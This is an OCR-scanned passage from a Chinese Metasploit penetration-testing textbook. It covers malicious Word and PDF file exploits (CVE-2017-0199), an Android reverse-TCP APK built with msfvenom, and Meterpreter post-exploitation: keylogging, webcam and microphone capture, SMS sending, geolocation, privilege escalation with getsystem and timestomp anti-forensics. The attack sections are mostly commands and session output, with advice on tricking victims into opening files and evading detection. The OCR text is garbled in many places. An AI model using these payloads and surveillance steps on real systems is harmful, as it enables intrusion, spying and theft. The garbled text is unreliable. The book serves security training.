害 者 下 载 并 运行 了 这 个 文件 ， 他 就 会 看 到 如 下 所 示 的 界面 。 



























































大 概 几 分 之 一 秒 之 后 ， 这 个 重 妥 的 窗口 就 会 消失 ， 从 此 我 们 就 会 获得 目标 系统 的 一 个 Meterpreter 
控制 权限 。 这 个 过 程 如 下 图 所 示 。 











msf exploit(windows/fileformat/nitro reader jsapi) > 
[*] 192.168.1.13 nitro reader jsapi - Sending second stage payload 
[*] http://192.168.1.14:4444 handling request from 192.168.1.13; (UUID: picxzpaa) Staging x86 payload (180825 bytes) 
[*] Meterpreter session 1 opened (192.168.1.14:4444 -> 192.168.1.13:30243) at 2018-04-12 05:48:20 -0400 
Deleted C:/Windows/Temp/avbz.hta 














7.3.2 基于 Word 文件 格式 的 渗透 攻击 


基于 Word 的 渗透 模块 主要 是 依靠 各 种 可 以 在 Microsoft Word 中 加 载 的 文件 格式 ， 其 中 一 些 格式 
的 文件 可 以 执行 恶意 代码 并 使 得 攻击 者 获得 日 标 系统 的 管理 权限 ,在 这 里 可 以 利用 与 之 前 PDF 文件 渗 
透 中 相同 的 方法 。 让 我 们 快速 查看 一 下 关于 该 漏洞 的 描述 。 
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测试 用 例 HO xh 
漏洞 这 个 模块 会 创建 一 个 恶意 的 RTF 文件 ， 当 在 一 个 存在 漏洞 的 Microsoft Word 版 本 中 打 














开 这 个 文件 之 后 ， los 恶意 代码 执行 。 此 漏洞 的 成 因 主要 是 Word AHAN E 
OLE2LINK 对 象 时 ， 从 而 导致 HTA 代码 执行 的 一 









































个 逻辑 漏洞 
渗透 软件 所 在 的 系统 Windows 732 位 
测试 所 使 用 的 软件 Microsoft Word 2013 
CVE 信息 https://www.cvedetails.com/cve/cve-2017-0199 
渗透 模块 的 细节 exploit/windows/fileformat/office word hta 
尝试 利用 这 个 漏洞 来 获取 目标 系统 的 控制 权限 。 因 此 ， 首 先 启动 Metasploit， 并 按照 如 下 屏幕 截 


图 所 示 创 建 一 个 文件 。 


msf > use exploit/windows/fileformat/office word hta 


Imsf exploit(windows/fileformat/office word hta) > show options 





Module options (exploit/windows/fileformat/office word hta): 


Name Current Setting Required Description 

FILENAME msf.doc yes The file name. 

SRVHOST — 0.0.0.0 yes The local host to listen on. This must be an address on the local machine or 0.0.0.0 
SRVPORT 8080 yes The local port to listen on. 

SSL false no Negotiate SSL for incoming connections 

SsLCert no Path to a custom SSL certificate (default is randomly generated) 

URIPATH — default.hta yes The URI to use for the HTA file 


Exploit target: 


Id Name 


0 Microsoft Office Word 


接 下 来 需要 将 参数 FILENAME 
主机 的 IP 地 址 ， 如 下 图 所 示 。 


msf exploit(windows/fileformat/office word hta) > show options 




















I 











的 值 设置 为 Report .doc， 将 参数 sRvHOST 的 值 设 置 为 我 们 使 用 








Module options (exploit/windows/fileformat/office word hta): 


Name Current Setting Required Description 

FILENAME Report.doc yes The file name. 

SRVHOST — 192.168.0.121 yes The local host to listen on. This must be an address on the local machine or 0.0.0.0 
SRVPORT 8080 yes The local port to listen on. 

SSL false no Negotiate SSL for incoming connections 

SSLCert no Path to a custom SSL certificate (default is randomly generated) 

URIPATH — default.hta yes The URI to use for the HTA file 


Payload options (windows/meterpreter/reverse tcp): 





Name Current Setting Required Description 

EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none) 
LHOST 127.0.0.1 yes The listen address 

LPORT 4444 yes The listen port 


[Exploit target: 


Id Name 


0 Microsoft Office Word 


Imsf exploit(windows/fileformat/office word hta) > set LHOST 192.168.0.121 
LHOST -» 192.168.0.121 
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E 的 文件 被 保存 在 /root/.msf4/local/Report.doc 中 , 我 们 可 以 将 其 移动 到 Apache 的 htdocs 文件 夹 中 。 


E 








root@kali:-# cp /root/.msf4/local/Report.doc /var/ww/htmL/l 











接 下 来 我 们 可 以 使 用 各 种 手段 将 这 个 Report.doc 文件 发 送 给 受害 者 ， 例 如 将 文件 上 传 到 网 站 ， 然 
后 将 这 个 链接 发 送 给 受害 者 ， 或 者 将 文件 放 在 USB 存储 设备 上 ， 再 或 者 将 其 制作 成 一 个 压缩 文件 ， 
然后 通过 电子 邮件 传播 。 不 过 这 里 出 于 演示 的 目的 ,我 们 将 这 个 文件 上 传 到 Apache 服务 器 上 。 —H. 
受害 者 下 载 并 运行 了 这 个 文件 ， 就 会 看 到 如 下 所 示 的 界面 。 


Opening Report.doc x 


You have chosen to open: 


m) Report.doc 
which is: Microsoft Word 97 - 2003 Document (5.6 KB) 
from: http://192.168.116.146 


























What should Firefox do with this file? 


O Open with | Microsoft Word (default) 
es "EE eaa 


Do this automatically for files like this from now on. 






































OK Cancel 
F F 这 个 文件 并 观察 接 下 来 都 发 生 了 什 和 
面 打开 这 个 文件 并 观察 么 。 

(EH o08S5- Report.doc [Compatibility Mode] - Word  7m-nDx 
GIS HOME INSERT DESIGN — PAGELAYOUT REFERENCES MAILINGS REVIEW VIEW GRAMMARLY Sign i 
E X Cu I EKİN PE «3.15 dA Find ~ 

D $ cop TTE E A ~ 2L 人 |AaBbccpd| AaBbcecpd AaBbC AaBbCc AaBbC E a Replace 

Paste j 2 ay. A~ 1 Open 

SÉ Fomatpainter B Z Y 7a X X A- 四 EH TNormal | f No Spac... Heading! Heading 2 Title *| ly Selec- Gr 
Clipboard Li Font Paragraph Styles * Editing Grammarly ^ 
i ; -x E i X 1 2 3 4 5 6 L 7 Án 

Navigation E 

Search document A- 


HEADINGS PAGES RESULTS 


Create an interactive outline of your document. 
It's a great way to keep track of where you are or quickly move 
your content around. 


To get started, go to the Home tab and apply Heading styles to 
the headings in your document. 











LI B -= 0 





PAGE1OF1 OWORDS ENGLISH (UNITED STATES) 
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RS 























控制 权限 。 











表面 上 看 起 来 好 像 什么 都 没有 发 生 。 现 在 我 们 返回 到 Metasploit 控制 台 ， 看 看 是 否 得 到 了 目标 的 





sf exploit(windows/fileformat/office word hta) > 

*] Using URL: http://192.168.0.121:8080/default.hta 
*] Server started. 

*] Sending stage (179779 bytes) to 192.168.0.105 

*] 





Report.doc stored at /root/.msf4/local/Report.doc 





Meterpreter session 1 opened (192.168.0.121:4444 -> 192.168.0.105:2188) at 2018-04-12 04:54:17 -0400 





太 棒 了 ， 我 们 现在 已 经 轻松 获得 了 目标 系统 的 控制 权限 。 在 这 个 演示 

















， 创 建 一 个 恶意 的 Word 


文档 ， 以 此 获得 目标 主机 的 访问 权限 是 一 件 很 轻松 的 事情 。 不 过 等 等 ， 真 的 这 么 容易 吗 ” 当然 不 是 ， 








这 里 我 们 并 没有 考虑 到 目标 系统 上 的 安全 机 制 。 在 现实 场景 中 ， 我 们 经 常会 遇见 杀毒 软件 和 防火 墙 ， 








这 些 安全 机 制 将 会 毁 掉 我 们 的 入 侵 企图 。 在 下 一 章 我 们 将 会 研究 如 何 解决 这 些 问 题 。 





7.4 使 用 Metasploit 攻击 Android 系统 





可 以 创建 一 个 新 的 APK 文件 ， 也 可 以 将 攻击 载荷 注入 到 一 个 现 有 的 APK 文件 来 攻击 Android Y 











S 








台 。 我 们 采用 第 一 种 方法 。 首 先 使 用 如 下 图 所 示 的 mstvenom 命令 来 创建 一 个 APK 文件 。 











from the payload 


Payload size: 8833 bytes 





rootEmm:~# msfvenom -p android/meterpreter/reverse tcp LHOST-192.1 
68.10.107 LPORT-4444 R> /var/www/html/pay2.apk 
No platform was selected, choosing Msf::Module::Platform::Android 


No Arch selected, selecting Arch: dalvik from the payload 
No encoder or badchars specified, outputting raw payload 






































成 功 创建 APK 文件 之 后 ， 我 们 需要 欺骗 受害 者 ( 使 用 社会 工程 学 ) 去 安装 这 个 APK 文件 , 或 者 





真 的 去 接触 这 个 电话 。 下 面 来 看 看 当 受 害 者 下 载 了 这 个 恶意 的 APK 文件 之 后 都 会 发 生 什么 。 


A This type of file can harm your device. Do x 
you want to keep pay2.apk anyway? 




















下 载 完成 之 后 ， 用 户 就 可 以 安装 这 个 文件 了 ， 过 程 如 下 图 所 示 。 
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£3 MainActivity 


Do you want to install this application? It will 
get access to: 


(S take pictures and videos 
B 


modify your contacts 
read your contacts 


9 precise location (GPS and network-based) 
record audio 


电 

WS directly call phone numbers 
® this may cost you money 
read phone status and identity 


加 read your text messages (SMS or MMS) 
receive text messages (SMS) 
send and view SMS messages 
® this may cost you money 


Bl modify or delete the contents of your USB 


storage 
read the contents of your USB storage 


CANCEL INSTALL 


绝 大 多 数 人 都 不 会 注意 应 用 程序 在 安装 时 所 要 求 的 权限 。 因 此 ,攻击 者 可 以 获得 手机 的 全 部 权限 
并 偷 走 用 户 的 个 人 隐私 数据 。 上 面 的 截图 列 出 了 一 个 应 用 程序 正常 运行 所 需 的 权限 。 当 安装 成 功 之 后 ， 
攻击 者 就 可 以 获得 目标 手机 的 完全 控制 权限 。 























msf > use exploit/multi/handler 
msf exploit(handler) » set payload android/meterpreter/reverse tcp| 


payload -» android/meterpreter/reverse tcp 

msf exploit(handler) » set LHOST 192.168.10.107 
LHOST => 192.168.10.107 

msf exploit(handler) » set LPORT 4444 

LPORT => 4444 

msf exploit(handler) » exploit 


[*] Started reverse TCP handler on 192.168.10.107:4444 

[*] Starting the payload handler... 

[*] Sending stage (60830 bytes) to 192.168.10.104 

[*] Meterpreter session 1 opened (192.168.10.107:4444 -» 192.168.1 
0.104:44753) at 2016-07-05 18:47:59 +0530 


meterpreter > 





























怎么 样 , 我 们 是 不 是 轻松 获取 了 目标 系统 的 Meterpreter 控制 权限 ?下 一 章 将 会 详细 介绍 后 渗透 模 
块 ， 现 在 先 来 看 一 些 它 的 基本 功能 。 

















meterpreter > check root 
Device is rooted 




















可 以 使 用 check root 命令 检查 目标 设备 是 否 已 经 进行 了 root 操作。 下面 来 看 看 其 他 函数 。 























meterpreter > send sms -d 8130 p RN -t "hello" 





SMS sent - Transmission successful 














使 用 send. sms 命令 可 以 从 被 渗透 的 手机 向 任意 号 码 发 送 短信 ,下 面 来 看 看 短信 是 和 否 发 送 成 功 。 


Peerlyst 


Your Peerlyst stats for the week of Jun 2 


16 17:38. 


5:48 PM 


Sat, 06/11/20 


O I call 


you later. 


12:00 PM 


Tue, 07/05/2016 


O hello 


? 





7:01 PM 





干 得 漂亮 ! 短信 已 经 成 功 发 送 。 接 下 来 就 让 我 们 使 用 sysinfo 命令 来 查看 一 下 这 台 “ 猜 物 ” 的 





FEE, 





meterpreter > sysinfo 
Computer : localhost 


os : 
Meterpreter : java/android 


: Android 6.0.1 - Linux 3.10.40-g34f16ee (armv71) 








接 下 来 对 这 部 手机 进行 定位 。 








|meterpreter > wlan geolocate 
[*] Google indicates the device is within 150 meters of 28.5448806,77.3689138. 


[*] Google Maps URL: Mhttps://maps.google.com/?q-28.5448806,77.3689138 








通过 从 谷歌 地 








KI 








上 查看 这 个 坐标 ， 可 以 找到 这 部 手机 所 在 的 精确 位 置 。 
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三 28.5448806,77.3689138 ° 


Cadence Gud 





Chocomocho 
å 
Shri Voda Mahadev i. 
Shiv Temple " 
28°32'41.6"N 77°22'08.1"E o Overhead Planet Lotier w 
Directions Tank 
m 3C Lotus Boulevard 
© | < Overhead 9 
State Bank Of India Pn WE T min walk ome 
SAVE NEARBY — SENDTOYOUR SHARE > Water Tank o 
PHONE Terer 12, Lotus 
Boulevard 
m 
J Adda label SBl atm 





AM 


然后 使 用 被 渗透 手机 的 摄像 头 来 拍 几 张 照片 看 看 : 











meterpreter > webcam snap 
[*] Starting... 
Got frame 
[*] Stopped 
Webcam shot saved to: /root/XlGjwKRr.jpeg 


可 以 通过 摄像 机 看 到 如 下 图 片 。 














gCijLhvF jpeg 





Image Edit View Go Help 
* Previous > Nec Q a aA) 5 € 


Image Properties vox 





General 

Name: 

gCijLhvF jpeg 
Width: 

4160 pixels 
Height: 

3120 pixels 
Type: 
JPEG image 


File size: 
483.4 kB. 


Folder: 
root 


Metadata 
Aperture Value: 
f/2.0 
Exposure Time: 
1/12 sec. 
Focal Length: 
0.0 (35mm film), 3.8 
(lens) 
Flash: 
Flash did not fire 
ISO Speed Rating: 
870 
Metering Mode: 
Unknown 
Camera Model: 
Nexus 6 








4160 x 3120 pixeis 483,4 kB. 24% 1/2 
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7.5 ”小结 与 练习 


在 本 章 中 我 们 动手 实践 了 一 种 客户 端 渗 透 攻击 。 使 用 客户 端 攻击 会 使 一 个 处 于 网 络 内 部 的 渗透 测 
试 工程 师 的 审计 工作 变 得 十 分 轻松 。 在 网 络 内 部 攻击 比 外 部 攻击 更 为 有 效 的 情形 下 ， 也 可 以 减轻 测试 
工程 师 的 工作 强度 。 

本 章 还 讲解 了 各 种 攻击 基于 客户 端的 系统 的 技术 。 我 们 学 习 了 基于 浏览 器 的 渗透 方法 及 其 延伸 方 
法 , 使 用 Arduino 对 基于 Windows 的 系统 进行 了 渗透 ， 了 解 了 如 何 创建 各 种 文件 格式 的 渗透 模块 及 如 
何 使 用 Metasploit 进行 DNS 欺骗 攻击 。 最 后 ， 还 学 习 了 如 何 对 基于 Linux 的 客户 端 进 行 渗透 ， 以 及 如 
何 对 Android 设备 进行 渗透 。 

你 也 可 以 自行 完成 下 面 这 些 练习 以 提高 你 的 能 力 。 

口 尝试 使 用 BetterCAP 完成 DNS 欺骗 。 
口 使 用 Metasploit 创建 恶意 的 PDF 和 Word 文档 ， 并 尝试 让 它们 躲 过 特征 检测 。 
口 尝试 将 生成 的 恶意 APK 文件 与 合法 的 APK 文件 绑 定 在 一 起 。 

在 下 一 章 中 ,我 们 将 详细 研究 后 渗透 测试 。 我 们 将 介绍 一 些 高 级 的 后 渗透 测试 模块 ， 利 用 它们 可 

以 收集 更 多 关于 目标 系统 的 有 用 信息 。 



































































































































第 8 章 


Metasploit 的 扩展 功能 








本 章 将 介绍 Metasploit 的 扩展 功能 和 后 渗透 模块 中 的 核心 部 分 。 我 们 会 将 重点 放 在 后 渗透 模块 中 
可 以 直接 使 用 的 功能 上 ， 还 会 尝试 各 种 复杂 的 任务 ， 例 如 提升 权限 、 获 取 明 文 密码 、 查 找 有 用 信息 ， 
等 等 。 

在 学 习 本 章 的 过 程 中 ， 我 们 将 对 以 下 几 个 要 点 进行 重点 讲解 。 
口 使 用 高 级 后 渗透 模块 。 
口 使 用 自动 化 脚本 加 速 渗透 测试 。 
口 提升 权限 。 
口 从 内 存 中 查找 密码 。 


现在 就 开始 学 习 Metasploit 中 的 后 渗透 模块 ， 下 一 节 将 从 基础 知识 讲 起 。 
8.1 Metasploit 后 渗透 模块 的 基础 知识 


前 面 的 章节 已 经 涉及 了 许多 后 渗透 模块 和 脚本 的 使 用 方法 ,本章 要 介绍 的 是 前 面 没 有 提 到 过 的 功 
能 。 下 一 节 将 从 最 基本 的 后 渗透 命令 开始 讲 起 。 


8.2 基本 后 渗透 命令 


核心 Meterpreter 命令 指 的 是 已 经 被 Meterpreter 成 功 渗透 的 计算 机 向 我 们 提供 的 用 于 后 渗透 操作 
的 基本 功能 。 现 在 先 从 一 些 可 以 帮助 你 实现 后 渗透 操作 的 最 基本 的 命令 开始 。 


8.2.1 帮助 菜单 


使 用 帮助 菜单 列 出 在 目标 上 可 以 使 用 的 所 有 命令 。 按 照 下 图 所 示 ， 输入 help 或 者 ?就 可 以 打开 
帮助 菜单 。 
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meterpreter > ? 


Core Commands 


Command Description 

? Help menu 

background Backgrounds the current session 

bgkill Kills a background meterpreter script 

bglist Lists running background scripts 

bgrun Executes a meterpreter script as a background thread 
channel Displays information or control active channels 
close Closes a channel 


disable unicode encoding Disables encoding of unicode strings 
enable unicode encoding Enables encoding of unicode strings 








exit Terminate the meterpreter session 

get timeouts Get the current session timeout values 

help Help menu 

info Displays information about a Post module 

irb Drop into irb scripting mode 

load Load one or more meterpreter extensions 

machine id Get the MSF ID of the machine attached to the session 
migrate Migrate the server to another process 

quit Terminate the meterpreter session 

read Reads data from a channel 

resource Run the commands stored in a file 

run Executes a meterpreter script or Post module 

set timeouts Set the current session timeout values 

sleep Force Meterpreter to go quiet, then re-establish session. 
transport Change the current transport mechanism 

use Deprecated alias for 'load' 

uuid Get the UUID for the current session 

write Writes data to a channel 





822 后台 命令 


在 进行 后 渗透 任务 的 时 候 ， 有 时 也 可 能 需要 执行 其 他 任务 ( 比如 测试 男 一 个 渗透 模块 ,或 者 运行 
提升 权限 的 模块 )。 为 了 执行 新 的 任务 ， 需 要 将 当前 执行 的 Meterpreter 会 话 切换 到 后 台 ， 这 时 就 可 以 
如 下 图 所 示 使 用 background 命令 。 















































meterpreter > background 
[*] Backgrounding session 1... 
msf exploit(rejetto hfs exec) > sessions -i 


Active sessions 


Id Type Information Connection 


1  meterpreter x86/win32 WIN-3KOU2TIJ4E0VXmm @ WIN-3KOU2TIJ4EO0 192.168.10.11 
2:4444 -> 192.168.10.110:49250 (192.168.10.110) 


msf exploit(rejetto hfs exec) > sessions -i 1 
[*] Starting interaction with 1... 





meterpreter > 





从 上 面 的 截图 可 以 看 出 ,我 们 已 经 成 功 将 会 话 切换 到 了 后 台 。 当 需要 将 一 个 会 话 切换 到 前 台 的 时 
候 ， 就 可 以 使 用 session 命令 加 上 该 会 话 的 会 话 标识 符 ， 命 令 格 式 为 sessions -i。 在 上 图 中 这 个 
会 话 标识 符 的 值 为 1。 























8.2.3 通信 信道 的 操作 


Meterpreter 可 以 通过 多 个 通信 信道 与 目标 进行 互动 。 为 了 实现 后 渗透 操作 ， 我 们 可 能 需要 列 出 通 
信 信 道 ， 并 指定 使 用 的 信道 。 这 些 操 作 可 以 通过 channel 命令 实现 ， 如 下 图 所 示 。 


meterpreter > channel -l 








1 3 stdapi process 


meterpreter > channel -r 1 
Read 134 bytes from 1: 


C: NUsersvmmVDown loads Nabb497bd93af f9fa3379b2aaf73fc9c7-hfs2.3 288» 
|C: \Users\mm\ Downloads Vabb497bd93af f9fa3379b2aaf73fc9c7-hfs2.3 288» 


在 上 图 中 ， 我 们 使 用 channel -1 命令 列 出 了 所 有 可 用 的 通信 信道 ， 然 后 使 用 channel -r 
[channel-id] 命 令 选 择 了 读 取 数据 的 通信 信道 。 信 道子 系统 允许 通过 所 有 的 逻辑 信道 进行 读 取 、 列 
举 、 写 和 人 等 操作 ， 这 些 逻 辑 信 道 都 是 通过 Meterpreter 命令 行 实现 的 通信 子 信 道 。 


824 文件 操作 命令 


前 面 的 章节 中 已 经 涉及 了 一 些 文件 操作 命令 , 现在 我 们 来 回顾 一 下 , 就 从 pwa 开始 吧 。 输 入 pwa 
命令 ， 可 以 查看 当前 的 工作 目录 ， 如 下 图 所 示 。 

































































meterpreter > pwd 
C:NUsersNmm 


此 外 ， 还 可 以 使 用 ca 命令 来 浏览 目标 文件 夹 ， 使 用 mkaqir 来 创建 一 个 文件 夹 ， 如 下 图 所 示 。 


meterpreter > cd C:\\ 
meterpreter > pwd 

c: \ 

meterpreter > mkdir metasploit 
Creating directory: metasploit 
Ilmeterpreter > cd metasploit 
meterpreter > pwd 

C: \metasploit 


使 用 Meterpreter 中 的 uploada 命令 就 可 以 将 文件 上 传 到 目标 系统 ， 如 下 图 所 示 。 
























































meterpreter > upload /root/Desktop/test.txt C:\ 
[*] uploading : /root/Desktop/test.txt -> C:\ 
[*] uploaded : /root/Desktop/test.txt -> C: WW test. txt 


接着 还 可 以 使 用 eaic 命令 加 文件 名 实现 对 所 有 文件 的 修改 ， 如 下 图 所 示 。 

















This is a test file.. Metasploit Rocks 目 














更 可 以 使 用 cat 命令 查看 文件 的 内 容 ， 如 下 图 所 示 。 
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meterpreter > edit C:\\test. txt 
meterpreter > cat C:\\test.txt 
This is a test file 

Metasploit Rocks 


使 用 1s 命令 可 以 列 出 指定 目录 中 的 所 有 文件 ， 如 下 图 所 示 。 


meterpreter > ls C:\ 























Mode Size Type Last modified Name 

40777 / ruxruxrwx 0 dir 2008-01-19 14:15:37 40530 $S$Recycle.Bin 
100444/r--r--r-- 8192 fil 2016-03-24 05:06:01 «0530 BOOTSECT.BAK 
40777/rwxrwxruwx 0 dir 2016-03-24 05:06:00 +0530 Boot 

40777 / ruxruxrwx dir 2008-01-19 17:21:52 40530 Documents and Settings 


0 
40777/rwxrwxrux 0 dir 2008-01-19 15:10:52 40530 PerfLogs 

40555/r-xr-xr-x 0 dir 2016-06-19 21:13:06 +0530 Program Files 
40777/rwxrwxrux 0 dir 2008-01-19 17:21:52 40530 ProgramData 
0 
0 
0 


40777 / ruxruxrwx dir 2016-03-24 04:06:36 +0530 System Volume Information 
40555/r-xr-xr-x dir 2016-06-19 20:27:20 +0530 Users 

40777 / rwxrwxrwx dir 2016-06-19 21:11:10 «0530 Windows 

100777/rwxrwxrwx 24 fil 2006-09-19 03:13:36 +0530 autoexec.bat 
100444/r--r--r-- 333203 fil 2008-01-19 13:15:45 +0530 bootmgr 

100666/rw-rw-rw- 10 fil 2006-09-19 03:13:37 40530 config.sys 


40777/rwxrwxrwx 0 dir 2016-03-23 16:15:31 40530 inetpub 
40777/rwxrwxrwx 0 dir 2016-06-19 22:03:51 +0530 aptoit | 


100666/rw-rw-rw- 1387765760 fil 2016-06-20 08:42:49 +0530 pagefile.sys 





100666/rw-rw-rw- 37 fil 2016-06-19 22:11:36 40530 test.txt 
使 用 rmdir 命令 可 以 从 目标 系统 上 删除 指定 的 文件 夹 , 使 用 rm 命令 可 以 删除 指定 的 文件 ， 如 下 


图 所 示 。 





meterpreter > rm test.txt 
meterpreter > ls 





Mode Size Type Last modified Name 

40777 / ruxruxrwx 0 dir 2008-01-19 14:15:37 40530 $Recycle.Bin 
100444/r--r--r-- 8192 fil 2016-03-24 05:06:01 «0530 BOOTSECT.BAK 
40777/rwxrwxrwux 0 dir 2016-03-24 05:06:00 +0530 Boot 

40777 / ruxruxrwx dir 2008-01-19 17:21:52 40530 Documents and Settings 


0 
40777/rwxrwxrwux 0 dir 2008-01-19 15:10:52 +0530 PerfLogs 

40555/r-xr-xr-x 0 dir 2016-06-19 21:13:06 40530 Program Files 
40777/rwxrwxrwux 0 dir 2008-01-19 17:21:52 +0530 ProgramData 
0 
0 
0 


40777 / ruxrwxrwx dir 2016-03-24 04:06:36 40530 System Volume Information 
40555/r-xr-xr-x dir 2016-06-19 20:27:20 +0530 Users 

40777 / ruxrwxrwx dir 2016-06-19 21:11:10 «0530 Windows 

100777/rwxrwxrwux 24 fil 2006-09-19 03:13:36 +0530 autoexec.bat 
100444/r--r--r-- 333203 fil 2008-01-19 13:15:45 +0530 bootmgr 

100666/rw-rw-rw- 10 fil 2006-09-19 03:13:37 40530 config.sys 
40777/rwxrwxrwux 0 dir 2016-03-23 16:15:31 40530  inetpub 

40777 / rwxrwxrwx 0 dir 2016-06-19 22:03:51 40530 metasploit 


100666/rw-rw-rw- 1387765760 fil 2016-06-20 08:42:49 40530 pagefile.sys 


使 用 download 命令 可 以 从 目标 下 载 文件 ， 如 下 图 所 示 。 


meterpreter > download creditcard.txt 
[*] downloading: creditcard.txt -» creditcard.txt 
[*] download  : creditcard.txt -> creditcard. txt 




















8.2.5 桌面 命令 


Metasploit 中 还 提供 了 各 种 桌面 命令 ， 例 如 桌面 列举 、 使 用 网 络 摄像 头 拍照 、 使 用 麦克 风 录 音 、 
使 用 摄像 机 录 视 频 等 。 下 面 给 出 这 些 命令 的 使 用 示例 。 

















TT 















































meterpreter > enumdesktops 
Enumerating all accessible desktops 


Desktops 


Session Station Name 

1 WinSta0 Screen-saver 
1 WinSta0 Default 

1 WinSta0 Disconnect 

1 WinSta0 Winlogon 


meterpreter » getdesktop 
Session 1\W\D 




















使 用 enumdesktops 和 gecdesktop 命令 可 以 查看 被 渗透 主机 的 桌面 信息 : enumdesktops fi 
令 列 出 了 所 有 可 以 访问 的 桌面 ， 而 getdaesktop 列 出 了 当前 桌面 的 相关 信息 。 



































IT 











8.2.6 ”截图 和 摄像 头 列举 


在 进行 屏幕 截图 、 摄 像 头 拍照 、 实 时 记录 视频 或 者 记录 键盘 操作 时 ， 必 须 事先 获得 客户 的 许可 。 
不 过 可 以 使 用 snapshot 命令 获取 当前 桌面 的 快照 ， 这 样 就 可 以 查看 目标 的 桌面 ， 如 下 图 所 示 。 

































































meterpreter > screenshot 
Screenshot saved to: /root/qNiFYBhp. jpeg 


可 以 按照 下 图 所 示 的 方法 查看 保存 的 图 片 。 

















qNiFYBhp.jpeg eoo0 
Image Edit View Go Help 
* Previous > Nt Q Q & [d] >e 
Image Properties 


General 





Name: 


Ehe peg 
Width: Fie Edit L i Mew Help - 
My P. Wi Nipun@12 
800 pixels y Password is Nipun@123| 
Height: 
600 pixels 
Type: 
JPEG image 
File size: 
24.9 kB 


Folder: 


root 


Metadata 


Aperture Value: 


Exposure Time: 





Focal Length: 


Flash: 


f7stat| | à, ER E | Ê Local Disk (C) T| Untitled - Notepad 


800 x 600 pixels 24.9 kB 100% 
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下 面 来 看 看 是 否 可 以 将 所 有 摄像 头 列 举 出 来 ， 并 查看 是 谁 在 使 用 这 个 系统 。 











meterpreter > webcam list 
1: Lenovo EasyCamera 
2: UScreenCapture 














使 用 webcam list 命令 就 可 以 将 目标 上 的 所 有 摄像 头 列举 出 来 。 然 后 使 用 webcam stream 命 
令 使 用 摄像 头 录制 实时 视频 ， 如 下 图 所 示 。 




















meterpreter > webcam stream 

[*] Starting... 

[*] Preparing player... 

[*] Opening player at: bAsPojXM.html 
[*] Streaming... 











输入 了 这 个 命令 之 后 ， 就 在 浏览 器 中 打开 了 一 个 网 络 摄像 头 ， 如 下 图 所 示 。 


Metasploit webcam.stre.. X | * 





€ Wb fle///root/bAsPojXM.html 


E3Most Visited v. 网 offensive Security "Ñ Kali Linux Kali Docs "Ñ Kali Tools KhExploit-D8 M Aircrack-ng 


Target IP 192.168.10.105 
Start time : 2016-07-10 16:24:21 +0530 
Status 











QE us 
4 MER - 





也 可 以 使 用 webcam_snap 命令 拍摄 一 张 照片 ， 而 不 是 观看 实时 视频 ， 如 下 图 所 示 。 






















root@mm: ~ eo 
File Edit View Search Terminal Help 
meterpreter » webcam snap 
[*] Starting... 
Got frame 
[*] Stopped 
lebcam shot saved to: /root/NTeMplrH.jpeg 
meterprete > 
meterpreter > 





Metering Mode: 


Camera Model: 







317 






1280» 720 pixeis 32.1kB 100% 

















某 些 时 候 我 们 可 能 出 于 监视 目的 需要 进行 环境 监听 , 那么 就 可 以 使 用 recora_mic 命令 , 如 下 图 
所 示 。 











meterpreter > record mic 

[*] Starting... 

[*] Stopped 

Audio saved to: /root/NrouXgVj .wav 
meterpreter » 








也 可 以 在 使 用 record. mic 命令 的 同时 加 上 -a 作为 参数 来 指定 录音 的 长 度 , 这 个 参数 的 单位 是 秒 。 


Meterpreter 的 男 一 个 强大 功能 是 可 以 计算 出 目标 系统 的 闲置 时 间 ， 以 此 推算 用 户 的 使 用 时 间 表 ， 
从 而 在 用 户 不 怎么 使 用 计算 机 的 时 间 段 发 起 攻击 。 这 个 功能 可 以 使 用 ialetime 命令 实现 , 如 下 图 所 示 。 















































meterpreter > idletime 
User has been idle for: 16 mins 43 secs 























通过 监控 目标 的 按键 敲 击 也 可 以 发 现 很 多 有 趣 的 信息 ， 如 下 图 所 示 输 入 keyscan. start 命令 就 
可 以 启动 键盘 监听 模块 。 





meterpreter > keyscan_start 
Starting the keystroke sniffer.. 


JURPB JE. fH keyscan dump 命令 来 导出 键盘 记录 ， 如 下 所 示 。 











meterpreter > keyscan_dump 
Dumping captured keystrokes... 
«LWin» r «Back» notepad «Return» My Pasw «Back» sword is Nipun@123 


在 这 一 节 中 ， 我 们 已 经 学 习 了 很 多 命令 。 接 着 来 看 一 些 高 级 后 渗透 模块 。 
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8.3 使 用 Metasploit 中 的 高 级 后 渗透 模块 
在 这 一 节 中 ， 我 们 将 通过 由 基本 命令 获取 的 信息 来 扩大 战 表 





pu 
o 





8.3.1 获取 系统 级 管理 权限 


如 果 被 成 功 渗透 的 应 用 程序 是 以 管理 员 权 限 运行 的 ， 那 么 仅 输 入 getsystem 命令 就 可 以 获取 系 
统 级 管理 权限 ， 如 下 图 所 示 。 












































meterpreter > getuid 
Server username: DESKTOP-PESQ21S\Apex 


meterpreter > getsystem 
. .got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)). 


meterpreter » getuid 
Server username: NT AUTHORITYNSYSTEM 


meterpreter » sysinto 


Computer DESKTOP -PESQ21S 

os : Windows 10 (Build 10586). 
Architecture : x64 (Current Process is W0W64) 
System Language : en US 

Domain : WORKGROUP 

Logged On Users : 2 

Meterpreter : x86/win32 








系统 级 管理 权限 提供 了 最 高 级 别 的 管理 权限 ， 所 以 我 们 可 以 完成 目标 系统 上 的 任何 操作 。 


getsystem 模块 在 比较 新 的 Windows 系统 中 运行 不 太 稳 定 , 最 好 使 用 本 地 的 提升 权 
限 方法 和 模块 来 提升 控制 权限 。 





8.3.2 ”使 用 timestomp 修改 文件 的 访问 时 间 、 修 改 时 间 和 创建 时 间 


Metasploit 的 使 用 范围 很 广 ， 从 私人 机 构 到 执法 部 门 都 可 以 看 到 它 的 身影 。 进 行 隐秘 操作 的 时 候 
修改 文件 的 访问 时 间 、 修 改 时 间 和 创建 时 间 是 一 个 绝 佳 的 做 法 。 在 上 一 节 中 ， 我 们 创建 了 一 个 名 为 
creditcard.txt 的 文件 ， 现 在 就 使 用 timestomp 命令 来 修改 它 的 属性 ， 如 下 图 所 示 。 















































meterpreter > timestomp -v creditcard.txt 


Modified : 2016-06-19 23:23:15 40530 
Accessed : 2016-06-19 23:23:15 +0530 
Created : 2016-06-19 23:23:15 +0530 


Entry Modified: 2016-06-19 23:23:26 40530 

meterpreter » timestomp -z "11/26/1999 15:15:25" creditcard.txt 
11/26/1999 15:15:25 

[*] Setting specific MACE attributes on creditcard.txt 


个 文件 的 访问 时 间 是 2016-06-19 23:23:15， 可 以 使 用 参数 -z 将 这 个 时 间 修 改 为 如 上 图 所 示 的 
